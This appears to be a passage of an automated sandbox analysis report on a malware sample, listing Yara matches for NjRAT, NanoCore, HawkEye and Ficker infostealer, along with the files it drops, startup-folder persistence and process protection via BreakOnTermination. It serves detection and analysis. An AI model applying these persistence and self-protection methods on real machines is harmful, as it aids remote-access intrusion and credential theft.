                    Source: Yara matchFile source: 9.2.Opus.exe.3edeacc.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Opus.exe.840000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.3ed9c96.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.3edeacc.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.3ee30f5.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.902324.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.5b04629.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Opus.exe.840000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.14.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000000.414257385.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.707363158.0000000003ECB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.414807841.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.416456851.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.700831183.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000000.475797127.0000000000572000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.567040014.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000000.491059532.0000000000272000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.629223400.0000000000572000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.415266906.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.579383399.0000000004081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.514866763.0000000000922000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.546334194.0000000004474000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000000.461250332.0000000000922000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.679442760.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.708751563.0000000005B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.674377761.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.673042782.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: healastounding.exe PID: 3572, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Opus.exe PID: 3244, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Opus.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\healastounding.exe, type: DROPPED
                    Yara detected Njrat
                    Source: Yara matchFile source: RIP_YOUR_PC_LOL.exe, type: SAMPLE
                    Source: Yara matchFile source: 4.2.healastounding.exe.34865dc.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.gay.exe.d0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.gay.exe.d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1d1caed.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.3479694.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.0.mediaget.exe.ab0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.0.mediaget.exe.ab0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.95312e.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.3474284.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.mediaget.exe.ab0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.gay.exe.d0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.gay.exe.d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.34865dc.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1d1caed.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.0.mediaget.exe.ab0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RIP_YOUR_PC_LOL.exe.5707591.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.0.mediaget.exe.ab0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.gay.exe.d0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RIP_YOUR_PC_LOL.exe.5725596.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000000.411478373.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.449565052.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002A.00000000.507357595.0000000000FB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000000.445953483.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.701265514.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000003B.00000000.627731740.00000000007A2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002E.00000000.548907669.0000000000722000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000000.445251023.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002E.00000002.610238464.0000000000722000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002A.00000002.552899490.0000000000FB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.410285813.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.408615715.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000000.447375879.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.386628983.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000000.446671445.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.409570794.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.679442760.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: healastounding.exe PID: 3572, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: gay.exe PID: 1104, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: mediaget.exe PID: 4688, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\gay.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mediaget.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\healastounding.exe, type: DROPPED

                    Operating System Destruction

                    barindex
                    Protects its processes via BreakOnTermination flag
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: 01 00 00 00

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: RIP_YOUR_PC_LOL.exe, type: SAMPLEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: RIP_YOUR_PC_LOL.exe, type: SAMPLEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: RIP_YOUR_PC_LOL.exe, type: SAMPLEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: RIP_YOUR_PC_LOL.exe, type: SAMPLEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: RIP_YOUR_PC_LOL.exe, type: SAMPLEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: RIP_YOUR_PC_LOL.exe, type: SAMPLEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: RIP_YOUR_PC_LOL.exe, type: SAMPLEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: RIP_YOUR_PC_LOL.exe, type: SAMPLEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.206ac1d.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.d4dd52.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5a556c1.5.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 9.2.Opus.exe.840000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 9.2.Opus.exe.840000.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 9.2.Opus.exe.840000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 9.0.Opus.exe.840000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 9.0.Opus.exe.840000.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 9.0.Opus.exe.840000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 4.2.healastounding.exe.34865dc.7.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.2.healastounding.exe.34865dc.7.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 8.0.gay.exe.d0000.2.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 8.0.gay.exe.d0000.2.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.c8867b.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 11.0.22.exe.5f65b6.17.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.Pluto Panel.exe.f10000.8.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.Pluto Panel.exe.f10000.8.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 5.2.Pluto Panel.exe.f6fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.2.Pluto Panel.exe.f6fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 5.2.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.2.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 9.2.Opus.exe.5b00000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 9.2.Opus.exe.5b00000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 5.2.Pluto Panel.exe.f18208.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.2.Pluto Panel.exe.f18208.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 6.2.test.exe.da0000.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects Ficker infostealer Author: ditekSHen
                    Source: 8.2.gay.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 8.2.gay.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 7.2.0fd7de5367376231a788872005d7ed4f.exe.24f15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Ficker infostealer Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1f6c52e.15.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 5.2.Pluto Panel.exe.f19c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.2.Pluto Panel.exe.f19c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 4.2.healastounding.exe.4474268.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 4.2.healastounding.exe.4474268.10.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 4.2.healastounding.exe.4474268.10.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1f6c52e.15.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1d1caed.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1d1caed.10.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 9.2.Opus.exe.5b00000.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 9.2.Opus.exe.5b00000.7.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 4.2.healastounding.exe.3479694.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 4.2.healastounding.exe.3479694.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.2.healastounding.exe.3479694.5.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detects Ficker infostealer Author: ditekSHen
                    Source: 4.0.healastounding.exe.902324.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 4.0.healastounding.exe.902324.11.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 4.0.healastounding.exe.902324.11.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 11.0.22.exe.5f65b6.23.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 11.0.22.exe.530edf.22.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 11.0.22.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 11.0.22.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 5.0.Pluto Panel.exe.f18208.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.Pluto Panel.exe.f18208.5.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 4.2.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.2.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detects Ficker infostealer Author: ditekSHen
                    Source: 6.0.test.exe.da0000.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 17.0.mediaget.exe.ab0000.3.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 17.0.mediaget.exe.ab0000.3.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 4.0.healastounding.exe.95312e.10.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.0.healastounding.exe.95312e.10.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 9.2.Opus.exe.2ea1844.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 9.2.Opus.exe.2ea1844.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 4.0.healastounding.exe.95312e.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.0.healastounding.exe.95312e.10.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 17.0.mediaget.exe.ab0000.0.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 17.0.mediaget.exe.ab0000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1fdd5e1.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.17.unpack, type: UNPACKEDPEMatched rule: Detects Ficker infostealer Author: ditekSHen
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects Ficker infostealer Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
